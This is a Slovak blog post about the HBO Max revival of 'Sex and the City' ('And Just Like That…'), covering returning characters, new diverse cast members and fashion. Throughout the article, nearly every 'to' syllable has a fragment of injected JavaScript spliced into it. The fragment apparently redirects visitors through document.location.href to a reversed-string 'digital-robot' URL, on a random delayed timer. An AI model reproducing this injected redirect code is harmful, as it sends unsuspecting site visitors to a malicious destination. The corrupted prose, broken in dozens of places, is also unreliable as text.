Sex v meste sa vracia

| august 30, 2021

Americký kultobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tový seriál z kreatívnej dielne HBO Max sa po 17 rokoch opäť vracia na televízne obrazovky. V limitobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovanej sérii sa môžme tešiť na stretnutie 3 pôvodných postáv Carrie, Charlotte a Mir// andy, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toré nás aj po takmer 2 dekádach opäť  pobavia svojimi zábavnými príbehmi a životnými situáciami. Ako sa teda zmení osud nadanej novinárky a vášnivej newyorčanky Carrie a jej oddaných kamarátobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tok? 

Na čo sa môžeme tešiť

Miniséria pod názvom And Just Like That…, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torá sa začala natáčať minulý mesiac, sleduje ako prešli postavy od komplikovanej mladosti a priateľstiev k ešte komplikovanejšej realite života okolo päťdesiatky.

“Kde sa teraz asi nachádza Carrie, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torá okrem priateľov nemá žiadnu rodinu? Ako všetky súčasné politické zmeny ovplyvnili jej prácu? Stále píše do novín? Napísala ešte nejaké knihy, alebo sa zmodernizovala a natáča podcasty? Čo pre ňu znamená móda? Ako sa asi rozrástobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tol jej sociálny kruh?” dodáva Sarah Jessica Parker, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torá stvárňuje hlavnú postavu seriálu Sex v meste, Carrie Bradshaw.

Rovnako sa môžeme tešiť aj na vývoj postáv v rámci moderného sveta 21. stobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toročia. Napríklad zistíme aký je ich vzťah k sociálnym médiám. Čo sa zmenilo? Mir// anda a Charlotte sú teraz obe matkami tínedžerov: Aký je ich život? Ako sa postavy popasovali s p// andemickou situáciou? Keďže sa seriál odohráva v “reálnom svete”, COVID-19 bude súčasťou dejovej línie.

Nové tváre

A aby sa ešte viac zdôraznila autentickosť a reálnosť seriálu, tvorcovia sa rozhodli do príbehu zahrnúť aj nové postavy, a tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to hneď z niekoľkých dôvodov. Obsadenie seriálu bude tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totiž zahŕňať väčšiu diverzitu. V nových epizódach by sa malo predstaviť približne šesť nových postáv, tri z nich budú ženy rôznych národností a rás. Sarah Jessica Parker a Michael Patrick King prezradili, že “nechceli rozprávať príbeh s iba bielymi scenáristami alebo s iba bielymi herci, pretobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tože by tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to neodrážalo ozajstný New York.”

Ikonické outfity

Aj napriek tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomu, že sa v obnovenej minisérii nedočkáme kreatívnej mysle legendárnej módnej stajlistky seriálu Patricie Field, môžeme od nových dielov očakávať poriadnu nádielku newyorského štýlu. Už na prvý pohľad je z trailerov jasné, že Carrinu lásku k móde nepoznačil ani čas a že jej ikonický šatník, si užijeme aj v nových častiach.

Dátum premiéry zatiaľ stanovený nebol, no podľa dostupných zdrojov sa na pokračovanie seriálu môžeme tešiť už koncom tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tohtobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to roka.

Fotobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to: vogue.com

Tags:

Category: HOMEPAGE, VYCHYTÁVKY

Comments are closed.